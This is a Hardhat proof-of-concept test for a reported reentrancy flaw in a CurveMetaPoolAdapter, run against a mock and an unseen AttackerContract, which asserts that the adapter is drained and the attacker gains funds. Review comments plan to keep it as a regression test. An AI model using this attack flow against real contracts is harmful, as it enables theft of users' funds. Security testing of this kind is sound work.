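// Hardhat proof-of-concept test for the reentrancy issue reported in CurveMetaPoolAdapter.
// It runs against CurveMetaPoolAdapterMock and AttackerContract, neither of which is
// shown here; what it proves depends on how faithfully the mock mirrors the real adapter.
// NOTE(review): once the adapter is fixed, keep this file as a regression test with the
// two balance assertions inverted (adapter balance unchanged, attacker balance zero).
const assert = require("node:assert"); // the original called assert() without importing it
const { ethers } = require("hardhat");

describe("Reentrancy Attack", function () {
  let curveMetaPoolAdapter;
  let attackerContract;
  let user;

  before(async function () {
    // Deploy a mock version of CurveMetaPoolAdapter
    const CurveMetaPoolAdapterMock = await ethers.getContractFactory("CurveMetaPoolAdapterMock");
    curveMetaPoolAdapter = await CurveMetaPoolAdapterMock.deploy();

    // Deploy AttackerContract, pointed at the mock adapter
    const AttackerContract = await ethers.getContractFactory("AttackerContract");
    attackerContract = await AttackerContract.deploy(curveMetaPoolAdapter.address);

    // First configured signer funds the adapter in the test below
    [user] = await ethers.getSigners();
  });

  it("should exploit reentrancy vulnerability", async function () {
    // The attacker contract's own address is where re-entered funds are expected to land
    // (`address` is a plain property, so no await is needed).
    const attackerAddress = attackerContract.address;

    // Fund the adapter so there is a balance whose movement can be observed
    const initialFunds = ethers.utils.parseEther("10");
    await user.sendTransaction({ to: curveMetaPoolAdapter.address, value: initialFunds });

    // Trigger the re-entrant call path through the attacker contract
    await attackerContract.attack(curveMetaPoolAdapter.address, attackerAddress, initialFunds);

    // The vulnerable adapter is expected to end with a zero balance
    const adapterBalance = await ethers.provider.getBalance(curveMetaPoolAdapter.address);
    assert(adapterBalance.eq(0), "Adapter balance should be drained");

    // ...and the attacker contract with a non-zero one
    const attackerBalance = await ethers.provider.getBalance(attackerAddress);
    assert(attackerBalance.gt(0), "Attacker should have stolen funds");
  });
});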